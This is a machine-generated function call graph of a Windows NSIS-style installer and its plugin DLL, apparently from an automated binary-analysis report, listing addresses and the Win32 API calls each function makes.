406119 WideCharToMultiByte 5049->5052 5051 402a1d CoTaskMemFree 5051->5041 5052->5051 5053 4027df 5054 402bce 17 API calls 5053->5054 5056 4027ed 5054->5056 5055 402803 5058 405c6b 2 API calls 5055->5058 5056->5055 5057 402bce 17 API calls 5056->5057 5057->5055 5059 402809 5058->5059 5081 405c90 GetFileAttributesA CreateFileA 5059->5081 5061 402816 5062 402822 GlobalAlloc 5061->5062 5063 4028bf 5061->5063 5064 4028b6 CloseHandle 5062->5064 5065 40283b 5062->5065 5066 4028c7 DeleteFileA 5063->5066 5067 4028da 5063->5067 5064->5063 5082 403300 SetFilePointer 5065->5082 5066->5067 5069 402841 5070 4032ea ReadFile 5069->5070 5071 40284a GlobalAlloc 5070->5071 5072 402894 5071->5072 5073 40285a 5071->5073 5075 405d37 WriteFile 5072->5075 5074 4030d8 31 API calls 5073->5074 5080 402867 5074->5080 5076 4028a0 GlobalFree 5075->5076 5077 4030d8 31 API calls 5076->5077 5079 4028b3 5077->5079 5078 40288b GlobalFree 5078->5072 5079->5064 5080->5078 5081->5061 5082->5069 4685 4023e0 4686 402bce 17 API calls 4685->4686 4687 4023f1 4686->4687 4688 402bce 17 API calls 4687->4688 4689 4023fa 4688->4689 4690 402bce 17 API calls 4689->4690 4691 402404 GetPrivateProfileStringA 4690->4691 5083 4028e0 5084 402bac 17 API calls 5083->5084 5085 4028e6 5084->5085 5086 402925 5085->5086 5087 40290e 5085->5087 5092 4027bf 5085->5092 5090 40293f 5086->5090 5091 40292f 5086->5091 5088 402922 5087->5088 5089 402913 5087->5089 5098 406055 wsprintfA 5088->5098 5097 4060f7 lstrcpynA 5089->5097 5094 40618a 17 API calls 5090->5094 5093 402bac 17 API calls 5091->5093 5093->5092 5094->5092 5097->5092 5098->5092 5099 401b63 5100 402bce 17 API calls 5099->5100 5101 401b6a 5100->5101 5102 402bac 17 API calls 5101->5102 5103 401b73 wsprintfA 5102->5103 5104 402a5a 5103->5104 4733 70052921 4734 70052971 4733->4734 4735 70052931 VirtualProtect 4733->4735 4735->4734 5105 401d65 5106 401d78 GetDlgItem 5105->5106 5107 401d6b 5105->5107 5109 401d72 5106->5109 5108 402bac 17 API calls 5107->5108 5108->5109 5110 401db9 GetClientRect LoadImageA SendMessageA 5109->5110 5111 402bce 17 API calls 5109->5111 5113 401e1a 5110->5113 5115 401e26 5110->5115 5111->5110 5114 401e1f DeleteObject 5113->5114 5113->5115 5114->5115 5116 4042e6 5117 4042fc 5116->5117 5123 404408 5116->5123 5121 40417b 18 API calls 5117->5121 5118 404477 5119 404541 5118->5119 5120 404481 GetDlgItem 5118->5120 5125 4041e2 8 API calls 5119->5125 5126 404497 5120->5126 5127 4044ff 5120->5127 5122 404352 5121->5122 5124 40417b 18 API calls 5122->5124 5123->5118 5123->5119 5128 40444c GetDlgItem SendMessageA 5123->5128 5129 40435f CheckDlgButton 5124->5129 5130 40453c 5125->5130 5126->5127 5131 4044bd SendMessageA LoadCursorA SetCursor 5126->5131 5127->5119 5132 404511 5127->5132 5149 40419d EnableWindow 5128->5149 5147 40419d EnableWindow 5129->5147 5153 40458a 5131->5153 5136 404517 SendMessageA 5132->5136 5137 404528 5132->5137 5136->5137 5137->5130 5142 40452e SendMessageA 5137->5142 5138 404472 5150 404566 5138->5150 5140 40437d GetDlgItem 5148 4041b0 SendMessageA 5140->5148 5142->5130 5144 404393 SendMessageA 5145 4043b1 GetSysColor 5144->5145 5146 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5144->5146 5145->5146 5146->5130 5147->5140 5148->5144 5149->5138 5151 404574 5150->5151 5152 404579 SendMessageA 5150->5152 5151->5152 5152->5118 5156 4057d9 ShellExecuteExA 5153->5156 5155 4044f0 LoadCursorA SetCursor 5155->5127 5156->5155 4736 40166a 4737 402bce 17 API calls 4736->4737 4738 401671 4737->4738 4739 402bce 17 API calls 4738->4739 4740 40167a 4739->4740 4741 402bce 17 API calls 4740->4741 4742 401683 MoveFileA 4741->4742 4743 401696 4742->4743 4749 40168f 4742->4749 4745 40646b 2 API calls 4743->4745 4747 4022e2 4743->4747 4744 401423 24 API calls 4744->4747 4746 4016a5 4745->4746 4746->4747 4748 405ed6 36 API calls 4746->4748 4748->4749 4749->4744 4750 40216b 4751 402bce 17 API calls 4750->4751 4752 402172 4751->4752 4753 402bce 17 API calls 4752->4753 4754 40217c 4753->4754 4755 402bce 17 API calls 4754->4755 4756 402186 4755->4756 4757 402bce 17 API calls 4756->4757 4758 402193 4757->4758 4759 402bce 17 API calls 4758->4759 4760 40219d 4759->4760 4761 4021df CoCreateInstance 4760->4761 4762 402bce 17 API calls 4760->4762 4765 4021fe 4761->4765 4767 4022ac 4761->4767 4762->4761 4763 401423 24 API calls 4764 4022e2 4763->4764 4766 40228c MultiByteToWideChar 4765->4766 4765->4767 4766->4767 4767->4763 4767->4764 5157 4022eb 5158 402bce 17 API calls 5157->5158 5159 4022f1 5158->5159 5160 402bce 17 API calls 5159->5160 5161 4022fa 5160->5161 5162 402bce 17 API calls 5161->5162 5163 402303 5162->5163 5164 40646b 2 API calls 5163->5164 5165 40230c 5164->5165 5166 40231d lstrlenA lstrlenA 5165->5166 5170 402310 5165->5170 5167 40521e 24 API calls 5166->5167 5169 402359 SHFileOperationA 5167->5169 5168 40521e 24 API calls 5171 402318 5168->5171 5169->5170 5169->5171 5170->5168 5170->5171 4777 40266d 4778 402bac 17 API calls 4777->4778 4783 402677 4778->4783 4779 4026e5 4780 405d08 ReadFile 4780->4783 4781 4026e7 4786 406055 wsprintfA 4781->4786 4782 4026f7 4782->4779 4785 40270d SetFilePointer 4782->4785 4783->4779 4783->4780 4783->4781 4783->4782 4785->4779 4786->4779 5172 40236d 5173 402374 5172->5173 5176 402387 5172->5176 5174 40618a 17 API calls 5173->5174 5175 402381 5174->5175 5175->5176 5177 405813 MessageBoxIndirectA 5175->5177 5177->5176 5178 4019ed 5179 402bce 17 API calls 5178->5179 5180 4019f4 5179->5180 5181 402bce 17 API calls 5180->5181 5182 4019fd 5181->5182 5183 401a04 lstrcmpiA 5182->5183 5184 401a16 lstrcmpA 5182->5184 5185 401a0a 5183->5185 5184->5185 5186 40296e 5187 402bac 17 API calls 5186->5187 5188 402974 5187->5188 5189 4029af 5188->5189 5190 4027bf 5188->5190 5192 402986 5188->5192 5189->5190 5191 40618a 17 API calls 5189->5191 5191->5190 5192->5190 5194 406055 wsprintfA 5192->5194 5194->5190 5195 70051837 5196 7005185a 5195->5196 5197 7005189c 5196->5197 5198 7005188a GlobalFree 5196->5198 5199 70051266 2 API calls 5197->5199 5198->5197 5200 70051a1e GlobalFree GlobalFree 5199->5200 5201 4014f4 SetForegroundWindow 5202 402a5a 5201->5202 4823 402476 4824 402bce 17 API calls 4823->4824 4825 402488 4824->4825 4826 402bce 17 API calls 4825->4826 4827 402492 4826->4827 4840 402c5e 4827->4840 4830 402a5a 4831 402bce 17 API calls 4835 4024c0 lstrlenA 4831->4835 4832 4024d3 4834 4024f5 RegSetValueExA 4832->4834 4837 4030d8 31 API calls 4832->4837 4833 4024c7 4833->4832 4836 402bac 17 API calls 4833->4836 4838 40250b RegCloseKey 4834->4838 4835->4833 4836->4832 4837->4834 4838->4830 4841 402c79 4840->4841 4844 405fab 4841->4844 4845 405fba 4844->4845 4846 4024a2 4845->4846 4847 405fc5 RegCreateKeyExA 4845->4847 4846->4830 4846->4831 4846->4833 4847->4846 5203 402777 5204 40277d 5203->5204 5205 402781 FindNextFileA 5204->5205 5207 402793 5204->5207 5206 4027d2 5205->5206 5205->5207 5209 4060f7 lstrcpynA 5206->5209 5209->5207 5210 7005103d 5211 7005101b 5 API calls 5210->5211 5212 70051056 5211->5212 5213 401ef9 5214 402bce 17 API calls 5213->5214 5215 401eff 5214->5215 5216 402bce 17 API calls 5215->5216 5217 401f08 5216->5217 5218 402bce 17 API calls 5217->5218 5219 401f11 5218->5219 5220 402bce 17 API calls 5219->5220 5221 401f1a 5220->5221 5222 401423 24 API calls 5221->5222 5223 401f21 5222->5223 5230 4057d9 ShellExecuteExA 5223->5230 5225 401f5c 5226 406575 5 API calls 5225->5226 5228 4027bf 5225->5228 5227 401f76 CloseHandle 5226->5227 5227->5228 5230->5225 4848 401f7b 4849 402bce 17 API calls 4848->4849 4850 401f81 4849->4850 4851 40521e 24 API calls 4850->4851 4852 401f8b 4851->4852 4853 405796 2 API calls 4852->4853 4854 401f91 4853->4854 4857 4027bf 4854->4857 4862 401fb2 CloseHandle 4854->4862 4863 406575 WaitForSingleObject 4854->4863 4858 401fa6 4859 401fb4 4858->4859 4860 401fab 4858->4860 4859->4862 4868 406055 wsprintfA 4860->4868 4862->4857 4864 40658f 4863->4864 4865 4065a1 GetExitCodeProcess 4864->4865 4866 40653c 2 API calls 4864->4866 4865->4858 4867 406596 WaitForSingleObject 4866->4867 4867->4864 4868->4862 5231 401ffb 5232 402bce 17 API calls 5231->5232 5233 402002 5232->5233 5234 406500 5 API calls 5233->5234 5235 402011 5234->5235 5236 402029 GlobalAlloc 5235->5236 5239 402091 5235->5239 5237 40203d 5236->5237 5236->5239 5238 406500 5 API calls 5237->5238 5240 402044 5238->5240 5241 406500 5 API calls 5240->5241 5242 40204e 5241->5242 5242->5239 5246 406055 wsprintfA 5242->5246 5244 402085 5247 406055 wsprintfA 5244->5247 5246->5244 5247->5239 5248 70051638 5249 70051667 5248->5249 5250 70051a98 18 API calls 5249->5250 5251 7005166e 5250->5251 5252 70051675 5251->5252 5253 70051681 5251->5253 5254 70051266 2 API calls 5252->5254 5255 700516a8 5253->5255 5256 7005168b 5253->5256 5259 7005167f 5254->5259 5257 700516d2 5255->5257 5258 700516ae 5255->5258 5260 700514e2 3 API calls 5256->5260 5262 700514e2 3 API calls 5257->5262 5261 70051559 3 API calls 5258->5261 5263 70051690 5260->5263 5264 700516b3 5261->5264 5262->5259 5265 70051559 3 API calls 5263->5265 5266 70051266 2 API calls 5264->5266 5267 70051696 5265->5267 5269 700516b9 GlobalFree 5266->5269 5268 70051266 2 API calls 5267->5268 5270 7005169c GlobalFree 5268->5270 5269->5259 5271 700516cd GlobalFree 5269->5271 5270->5259 5271->5259 5272 4018fd 5273 401934 5272->5273 5274 402bce 17 API calls 5273->5274 5275 401939 5274->5275 5276 4058bf 67 API calls 5275->5276 5277 401942 5276->5277 5278 401000 5279 401037 BeginPaint GetClientRect 5278->5279 5280 40100c DefWindowProcA 5278->5280 5282 4010f3 5279->5282 5283 401179 5280->5283 5284 401073 CreateBrushIndirect FillRect DeleteObject 5282->5284 5285 4010fc 5282->5285 5284->5282 5286 401102 CreateFontIndirectA 5285->5286 5287 401167 EndPaint 5285->5287 5286->5287 5288 401112 6 API calls 5286->5288 5287->5283 5288->5287 5289 401900 5290 402bce 17 API calls 5289->5290 5291 401907 5290->5291 5292 405813 MessageBoxIndirectA 5291->5292 5293 401910 5292->5293 5294 404b80 GetDlgItem GetDlgItem 5295 404bd6 7 API calls 5294->5295 5299 404dfd 5294->5299 5296 404c72 SendMessageA 5295->5296 5297 404c7e DeleteObject 5295->5297 5296->5297 5298 404c89 5297->5298 5300 404cc0 5298->5300 5301 40618a 17 API calls 5298->5301 5316 404edf 5299->5316 5326 404e6c 5299->5326 5348 404ace SendMessageA 5299->5348 5302 40417b 18 API calls 5300->5302 5306 404ca2 SendMessageA SendMessageA 5301->5306 5307 404cd4 5302->5307 5303 404f8b 5304 404f95 SendMessageA 5303->5304 5305 404f9d 5303->5305 5304->5305 5318 404fb6 5305->5318 5319 404faf ImageList_Destroy 5305->5319 5323 404fc6 5305->5323 5306->5298 5313 40417b 18 API calls 5307->5313 5308 404df0 5311 4041e2 8 API calls 5308->5311 5309 404f38 SendMessageA 5309->5308 5315 404f4d SendMessageA 5309->5315 5310 404ed1 SendMessageA 5310->5316 5317 40518b 5311->5317 5327 404ce5 5313->5327 5314 40513f 5314->5308 5324 405151 ShowWindow GetDlgItem ShowWindow 5314->5324 5321 404f60 5315->5321 5316->5303 5316->5308 5316->5309 5322 404fbf GlobalFree 5318->5322 5318->5323 5319->5318 5320 404dbf GetWindowLongA SetWindowLongA 5325 404dd8 5320->5325 5331 404f71 SendMessageA 5321->5331 5322->5323 5323->5314 5340 405001 5323->5340 5353 404b4e 5323->5353 5324->5308 5328 404df5 5325->5328 5329 404ddd ShowWindow 5325->5329 5326->5310 5326->5316 5327->5320 5330 404d37 SendMessageA 5327->5330 5332 404dba 5327->5332 5335 404d75 SendMessageA 5327->5335 5336 404d89 SendMessageA 5327->5336 5347 4041b0 SendMessageA 5328->5347 5346 4041b0 SendMessageA 5329->5346 5330->5327 5331->5303 5332->5320 5332->5325 5335->5327 5336->5327 5338 40510b 5339 405115 InvalidateRect 5338->5339 5342 405121 5338->5342 5339->5342 5341 40502f SendMessageA 5340->5341 5345 405045 5340->5345 5341->5345 5342->5314 5362 404a89 5342->5362 5344 4050b9 SendMessageA SendMessageA 5344->5345 5345->5338 5345->5344 5346->5308 5347->5299 5349 404af1 GetMessagePos ScreenToClient SendMessageA 5348->5349 5350 404b2d SendMessageA 5348->5350 5351 404b25 5349->5351 5352 404b2a 5349->5352 5350->5351 5351->5326 5352->5350 5365 4060f7 lstrcpynA 5353->5365 5355 404b61 5366 406055 wsprintfA 5355->5366 5357 404b6b 5358 40140b 2 API calls 5357->5358 5359 404b74 5358->5359 5367 4060f7 lstrcpynA 5359->5367 5361 404b7b 5361->5340 5368 4049c4 5362->5368 5364 404a9e 5364->5314 5365->5355 5366->5357 5367->5361 5369 4049da 5368->5369 5370 40618a 17 API calls 5369->5370 5371 404a3e 5370->5371 5372 40618a 17 API calls 5371->5372 5373 404a49 5372->5373 5374 40618a 17 API calls 5373->5374 5375 404a5f lstrlenA wsprintfA SetDlgItemTextA 5374->5375 5375->5364 5376 401502 5377 40150a 5376->5377 5379 40151d 5376->5379 5378 402bac 17 API calls 5377->5378 5378->5379 5380 402604 5381 402bce 17 API calls 5380->5381 5382 40260b 5381->5382 5385 405c90 GetFileAttributesA CreateFileA 5382->5385 5384 402617 5385->5384 3933 401b87 3934 401b94 3933->3934 3935 401bd8 3933->3935 3938 401c1c 3934->3938 3941 401bab 3934->3941 3936 401c01 GlobalAlloc 3935->3936 3937 401bdc 3935->3937 3940 40618a 17 API calls 3936->3940 3947 402387 3937->3947 3954 4060f7 lstrcpynA 3937->3954 3939 40618a 17 API calls 3938->3939 3938->3947 3942 402381 3939->3942 3940->3938 3952 4060f7 lstrcpynA 3941->3952 3942->3947 3955 405813 3942->3955 3945 401bee GlobalFree 3945->3947 3946 401bba 3953 4060f7 lstrcpynA 3946->3953 3950 401bc9 3959 4060f7 lstrcpynA 3950->3959 3952->3946 3953->3950 3954->3945 3956 405828 3955->3956 3957 405874 3956->3957 3958 40583c MessageBoxIndirectA 3956->3958 3957->3947 3958->3957 3959->3947 4398 402588 4410 402c0e 4398->4410 4401 402bac 17 API calls 4402 40259b 4401->4402 4403 4025a9 4402->4403 4404 4027bf 4402->4404 4405 4025c2 RegEnumValueA 4403->4405 4406 4025b6 RegEnumKeyA 4403->4406 4407 4025d7 4405->4407 4408 4025de RegCloseKey 4405->4408 4406->4408 4407->4408 4408->4404 4411 402bce 17 API calls 4410->4411 4412 402c25 4411->4412 4413 405f7d RegOpenKeyExA 4412->4413 4414 402592 4413->4414 4414->4401 4415 401389 4417 401390 4415->4417 4416 4013fe 4417->4416 4418 4013cb MulDiv SendMessageA 4417->4418 4418->4417 5386 40460d 5387 404639 5386->5387 5388 40464a 5386->5388 5447 4057f7 GetDlgItemTextA 5387->5447 5390 404656 GetDlgItem 5388->5390 5422 4046b5 5388->5422 5393 40466a 5390->5393 5391 404644 5392 4063d2 5 API calls 5391->5392 5392->5388 5395 40467e SetWindowTextA 5393->5395 5399 405b28 4 API calls 5393->5399 5394 404799 5396 404943 5394->5396 5449 4057f7 GetDlgItemTextA 5394->5449 5400 40417b 18 API calls 5395->5400 5398 4041e2 8 API calls 5396->5398 5403 404957 5398->5403 5404 404674 5399->5404 5405 40469a 5400->5405 5401 40618a 17 API calls 5406 404729 SHBrowseForFolderA 5401->5406 5402 4047c9 5407 405b7d 18 API calls 5402->5407 5404->5395 5413 405a8f 3 API calls 5404->5413 5408 40417b 18 API calls 5405->5408 5406->5394 5409 404741 CoTaskMemFree 5406->5409 5410 4047cf 5407->5410 5411 4046a8 5408->5411 5412 405a8f 3 API calls 5409->5412 5450 4060f7 lstrcpynA 5410->5450 5448 4041b0 SendMessageA 5411->5448 5415 40474e 5412->5415 5413->5395 5418 404785 SetDlgItemTextA 5415->5418 5423 40618a 17 API calls 5415->5423 5417 4046ae 5420 406500 5 API calls 5417->5420 5418->5394 5419 4047e6 5421 406500 5 API calls 5419->5421 5420->5422 5430 4047ed 5421->5430 5422->5394 5422->5396 5422->5401 5424 40476d lstrcmpiA 5423->5424 5424->5418 5427 40477e lstrcatA 5424->5427 5425 404829 5451 4060f7 lstrcpynA 5425->5451 5427->5418 5428 404830 5429 405b28 4 API calls 5428->5429 5431 404836 GetDiskFreeSpaceA 5429->5431 5430->5425 5434 405ad6 2 API calls 5430->5434 5436 404881 5430->5436 5433 40485a MulDiv 5431->5433 5431->5436 5433->5436 5434->5430 5435 4048f2 5438 404915 5435->5438 5440 40140b 2 API calls 5435->5440 5436->5435 5437 404a89 20 API calls 5436->5437 5439 4048df 5437->5439 5452 40419d EnableWindow 5438->5452 5441 4048f4 SetDlgItemTextA 5439->5441 5442 4048e4 5439->5442 5440->5438 5441->5435 5445 4049c4 20 API calls 5442->5445 5444 404931 5444->5396 5446 404566 SendMessageA 5444->5446 5445->5435 5446->5396 5447->5391 5448->5417 5449->5402 5450->5419 5451->5428 5452->5444 5453 401490 5454 40521e 24 API calls 5453->5454 5455 401497 5454->5455 5456 405192 5457 4051a2 5456->5457 5458 4051b6 5456->5458 5459 4051ff 5457->5459 5460 4051a8 5457->5460 5461 4051be IsWindowVisible 5458->5461 5467 4051d5 5458->5467 5464 405204 CallWindowProcA 5459->5464 5462 4041c7 SendMessageA 5460->5462 5461->5459 5463 4051cb 5461->5463 5465 4051b2 5462->5465 5466 404ace 5 API calls 5463->5466 5464->5465 5466->5467 5467->5464 5468 404b4e 4 API calls 5467->5468 5468->5459 5469 700515d1 5470 700514bb GlobalFree 5469->5470 5471 700515e9 5470->5471 5472 7005162f GlobalFree 5471->5472 5473 70051604 5471->5473 5474 7005161b VirtualFree 5471->5474 5473->5472 5474->5472 4424 402516 4425 402c0e 17 API calls 4424->4425 4426 402520 4425->4426 4427 402bce 17 API calls 4426->4427 4428 402529 4427->4428 4429 402533 RegQueryValueExA 4428->4429 4433 4027bf 4428->4433 4430 402559 RegCloseKey 4429->4430 4431 402553 4429->4431 4430->4433 4431->4430 4435 406055 wsprintfA 4431->4435 4435->4430 4478 40239c 4479 4023a4 4478->4479 4480 4023aa 4478->4480 4481 402bce 17 API calls 4479->4481 4482 402bce 17 API calls 4480->4482 4483 4023ba 4480->4483 4481->4480 4482->4483 4484 4023c8 4483->4484 4485 402bce 17 API calls 4483->4485 4486 402bce 17 API calls 4484->4486 4485->4484 4487 4023d1 WritePrivateProfileStringA 4486->4487 4488 40209d 4489 40215d 4488->4489 4490 4020af 4488->4490 4492 401423 24 API calls 4489->4492 4491 402bce 17 API calls 4490->4491 4493 4020b6 4491->4493 4498 4022e2 4492->4498 4494 402bce 17 API calls 4493->4494 4495 4020bf 4494->4495 4496 4020d4 LoadLibraryExA 4495->4496 4497 4020c7 GetModuleHandleA 4495->4497 4496->4489 4499 4020e4 GetProcAddress 4496->4499 4497->4496 4497->4499 4500 402130 4499->4500 4501 4020f3 4499->4501 4502 40521e 24 API calls 4500->4502 4503 402112 4501->4503 4504 4020fb 4501->4504 4505 402103 4502->4505 4509 700516db 4503->4509 4551 401423 4504->4551 4505->4498 4507 402151 FreeLibrary 4505->4507 4507->4498 4510 7005170b 4509->4510 4554 70051a98 4510->4554 4512 70051712 4513 70051834 4512->4513 4514 70051723 4512->4514 4515 7005172a 4512->4515 4513->4505 4604 700522af 4514->4604 4588 700522f1 4515->4588 4520 7005174f 4521 70051770 4520->4521 4522 7005178e 4520->4522 4617 700524d8 4521->4617 4526 70051794 4522->4526 4527 700517dc 4522->4527 4524 70051740 4525 70051746 4524->4525 4530 70051751 4524->4530 4525->4520 4598 70052a38 4525->4598 4636 7005156b 4526->4636 4534 700524d8 11 API calls 4527->4534 4528 70051759 4528->4520 4614 70052cc3 4528->4614 4529 70051776 4628 70051559 4529->4628 4608 700526b2 4530->4608 4535 700517cd 4534->4535 4542 70051823 4535->4542 4642 7005249e 4535->4642 4540 70051757 4540->4520 4541 700524d8 11 API calls 4541->4535 4542->4513 4546 7005182d GlobalFree 4542->4546 4546->4513 4548 7005180f 4548->4542 4646 700514e2 wsprintfA 4548->4646 4549 70051808 FreeLibrary 4549->4548 4552 40521e 24 API calls 4551->4552 4553 401431 4552->4553 4553->4505 4649 70051215 GlobalAlloc 4554->4649 4556 70051abf 4650 70051215 GlobalAlloc 4556->4650 4558 70051d00 GlobalFree GlobalFree GlobalFree 4559 70051d1d 4558->4559 4567 70051d67 4558->4567 4561 700520f1 4559->4561 4562 70051d32 4559->4562 4559->4567 4560 70051aca 4560->4558 4563 70051bbd GlobalAlloc 4560->4563 4564 70052033 4560->4564 4566 70051c08 lstrcpyA 4560->4566 4560->4567 4568 70051c26 GlobalFree 4560->4568 4571 70051c12 lstrcpyA 4560->4571 4575 70051fb7 4560->4575 4580 70051ef9 GlobalFree 4560->4580 4581 70051224 2 API calls 4560->4581 4582 70051c64 4560->4582 4565 70052113 GetModuleHandleA 4561->4565 4561->4567 4562->4567 4653 70051224 4562->4653 4563->4560 4564->4567 4585 7005208c lstrcpyA 4564->4585 4569 70052124 LoadLibraryA 4565->4569 4570 70052139 4565->4570 4566->4571 4567->4512 4568->4560 4569->4567 4569->4570 4657 700515c2 GetProcAddress 4570->4657 4571->4560 4573 7005214b 4574 7005218a 4573->4574 4586 70052174 GetProcAddress 4573->4586 4574->4567 4578 70052197 lstrlenA 4574->4578 4656 70051215 GlobalAlloc 4575->4656 4658 700515c2 GetProcAddress 4578->4658 4580->4560 4581->4560 4582->4560 4651 70051534 GlobalSize GlobalAlloc 4582->4651 4583 700521b0 4583->4567 4585->4567 4586->4574 4587 70051fbf 4587->4512 4593 7005230a 4588->4593 4590 70052446 GlobalFree 4592 70051730 4590->4592 4590->4593 4591 700523b8 GlobalAlloc MultiByteToWideChar 4595 70052405 4591->4595 4596 700523e4 GlobalAlloc CLSIDFromString GlobalFree 4591->4596 4592->4520 4592->4524 4592->4528 4593->4590 4593->4591 4594 70051224 GlobalAlloc lstrcpynA 4593->4594 4593->4595 4660 700512ad 4593->4660 4594->4593 4595->4590 4664 70052646 4595->4664 4596->4590 4600 70052a4a 4598->4600 4599 70052aef VirtualAllocEx 4603 70052b0d 4599->4603 4600->4599 4602 70052bd9 4602->4520 4667 700529e4 4603->4667 4605 700522c4 4604->4605 4606 700522cf GlobalAlloc 4605->4606 4607 70051729 4605->4607 4606->4605 4607->4515 4612 700526e2 4608->4612 4609 70052790 4611 70052796 GlobalSize 4609->4611 4613 700527a0 4609->4613 4610 7005277d GlobalAlloc 4610->4613 4611->4613 4612->4609 4612->4610 4613->4540 4615 70052cce 4614->4615 4616 70052d0e GlobalFree 4615->4616 4671 70051215 GlobalAlloc 4617->4671 4619 700524e4 4620 70052574 StringFromGUID2 WideCharToMultiByte 4619->4620 4621 70052563 lstrcpynA 4619->4621 4622 70052598 WideCharToMultiByte 4619->4622 4623 700525b9 wsprintfA 4619->4623 4624 700525dd GlobalFree 4619->4624 4625 70052617 GlobalFree 4619->4625 4626 70051266 2 API calls 4619->4626 4672 700512d1 4619->4672 4620->4619 4621->4619 4622->4619 4623->4619 4624->4619 4625->4529 4626->4619 4676 70051215 GlobalAlloc 4628->4676 4630 7005155e 4631 7005156b 2 API calls 4630->4631 4632 70051568 4631->4632 4633 70051266 4632->4633 4634 7005126f GlobalAlloc lstrcpynA 4633->4634 4635 700512a8 GlobalFree 4633->4635 4634->4635 4635->4535 4637 700515a4 lstrcpyA 4636->4637 4638 70051577 wsprintfA 4636->4638 4641 700515bd 4637->4641 4638->4641 4641->4541 4643 700524ac 4642->4643 4645 700517ef 4642->4645 4644 700524c5 GlobalFree 4643->4644 4643->4645 4644->4643 4645->4548 4645->4549 4647 70051266 2 API calls 4646->4647 4648 70051503 4647->4648 4648->4542 4649->4556 4650->4560 4652 70051552 4651->4652 4652->4582 4659 70051215 GlobalAlloc 4653->4659 4655 70051233 lstrcpynA 4655->4567 4656->4587 4657->4573 4658->4583 4659->4655 4661 700512b4 4660->4661 4662 70051224 2 API calls 4661->4662 4663 700512cf 4662->4663 4663->4593 4665 70052654 VirtualAlloc 4664->4665 4666 700526aa 4664->4666 4665->4666 4666->4595 4668 700529ef 4667->4668 4669 700529f4 GetLastError 4668->4669 4670 700529ff 4668->4670 4669->4670 4670->4602 4671->4619 4673 700512f9 4672->4673 4674 700512da 4672->4674 4673->4619 4674->4673 4675 700512e0 lstrcpyA 4674->4675 4675->4673 4676->4630 4677 40159d 4678 402bce 17 API calls 4677->4678 4679 4015a4 SetFileAttributesA 4678->4679 4680 4015b6 4679->4680 5475 70051058 5477 70051074 5475->5477 5476 700510dc 5477->5476 5478 70051091 5477->5478 5479 700514bb GlobalFree 5477->5479 5480 700514bb GlobalFree 5478->5480 5479->5478 5481 700510a1 5480->5481 5482 700510b1 5481->5482 5483 700510a8 GlobalSize 5481->5483 5484 700510b5 GlobalAlloc 5482->5484 5486 700510c6 5482->5486 5483->5482 5485 700514e2 3 API calls 5484->5485 5485->5486 5487 700510d1 GlobalFree 5486->5487 5487->5476 5488 40149d 5489 402387 5488->5489 5490 4014ab PostQuitMessage 5488->5490 5490->5489 5491 401a1e 5492 402bce 17 API calls 5491->5492 5493 401a27 ExpandEnvironmentStringsA 5492->5493 5494 401a3b 5493->5494 5496 401a4e 5493->5496 5495 401a40 lstrcmpA 5494->5495 5494->5496 5495->5496 4681 40171f 4682 402bce 17 API calls 4681->4682 4683 401726 SearchPathA 4682->4683 4684 401741 4683->4684 5502 7005225a 5503 700522c4 5502->5503 5504 700522cf GlobalAlloc 5503->5504 5505 700522ee 5503->5505 5504->5503 5506 401d1f 5507 402bac 17 API calls 5506->5507 5508 401d26 5507->5508 5509 402bac 17 API calls 5508->5509 5510 401d32 GetDlgItem 5509->5510 5511 402620 5510->5511 4692 402421 4693 402453 4692->4693 4694 402428 4692->4694 4695 402bce 17 API calls 4693->4695 4696 402c0e 17 API calls 4694->4696 4697 40245a 4695->4697 4698 40242f 4696->4698 4704 402c8c 4697->4704 4700 402439 4698->4700 4703 402467 4698->4703 4701 402bce 17 API calls 4700->4701 4702 402440 RegDeleteValueA RegCloseKey 4701->4702 4702->4703 4705 402c9f 4704->4705 4707 402c98 4704->4707 4705->4707 4708 402cd0 4705->4708 4707->4703 4709 405f7d RegOpenKeyExA 4708->4709 4710 402cfe 4709->4710 4711 402db3 4710->4711 4712 402d08 4710->4712 4711->4707 4713 402d0e RegEnumValueA 4712->4713 4722 402d31 4712->4722 4714 402d98 RegCloseKey 4713->4714 4713->4722 4714->4711 4715 402d6d RegEnumKeyA 4716 402d76 RegCloseKey 4715->4716 4715->4722 4717 406500 5 API calls 4716->4717 4718 402d86 4717->4718 4720 402da8 4718->4720 4721 402d8a RegDeleteKeyA 4718->4721 4719 402cd0 6 API calls 4719->4722 4720->4711 4721->4711 4722->4714 4722->4715 4722->4716 4722->4719 4723 4027a1 4724 402bce 17 API calls 4723->4724 4725 4027a8 FindFirstFileA 4724->4725 4726 4027cb 4725->4726 4730 4027bb 4725->4730 4727 4027d2 4726->4727 4731 406055 wsprintfA 4726->4731 4732 4060f7 lstrcpynA 4727->4732 4731->4727 4732->4730 5512 700510e0 5513 7005110e 5512->5513 5514 700511c4 GlobalFree 5513->5514 5515 700512ad 2 API calls 5513->5515 5516 700511c3 5513->5516 5517 70051266 2 API calls 5513->5517 5518 70051155 GlobalAlloc 5513->5518 5519 700511ea GlobalFree 5513->5519 5520 700511b1 GlobalFree 5513->5520 5521 700512d1 lstrcpyA 5513->5521 5515->5513 5516->5514 5517->5520 5518->5513 5519->5513 5520->5513 5521->5513 5522 402626 5523 40262b 5522->5523 5524 40263f 5522->5524 5525 402bac 17 API calls 5523->5525 5526 402bce 17 API calls 5524->5526 5528 402634 5525->5528 5527 402646 lstrlenA 5526->5527 5527->5528 5529 402668 5528->5529 5530 405d37 WriteFile 5528->5530 5530->5529 5531 70052be3 5532 70052bfb 5531->5532 5533 70051534 2 API calls 5532->5533 5534 70052c16 5533->5534 5535 403ca7 5536 403dfa 5535->5536 5537 403cbf 5535->5537 5539 403e4b 5536->5539 5540 403e0b GetDlgItem GetDlgItem 5536->5540 5537->5536 5538 403ccb 5537->5538 5541 403cd6 SetWindowPos 5538->5541 5542 403ce9 5538->5542 5544 403ea5 5539->5544 5552 401389 2 API calls 5539->5552 5543 40417b 18 API calls 5540->5543 5541->5542 5545 403d06 5542->5545 5546 403cee ShowWindow 5542->5546 5547 403e35 SetClassLongA 5543->5547 5548 4041c7 SendMessageA 5544->5548 5595 403df5 5544->5595 5549 403d28 5545->5549 5550 403d0e DestroyWindow 5545->5550 5546->5545 5551 40140b 2 API calls 5547->5551 5593 403eb7 5548->5593 5553 403d2d SetWindowLongA 5549->5553 5554 403d3e 5549->5554 5603 404104 5550->5603 5551->5539 5555 403e7d 5552->5555 5553->5595 5558 403d4a GetDlgItem 5554->5558 5571 403db5 5554->5571 5555->5544 5559 403e81 SendMessageA 5555->5559 5556 40140b 2 API calls 5556->5593 5557 404106 DestroyWindow EndDialog 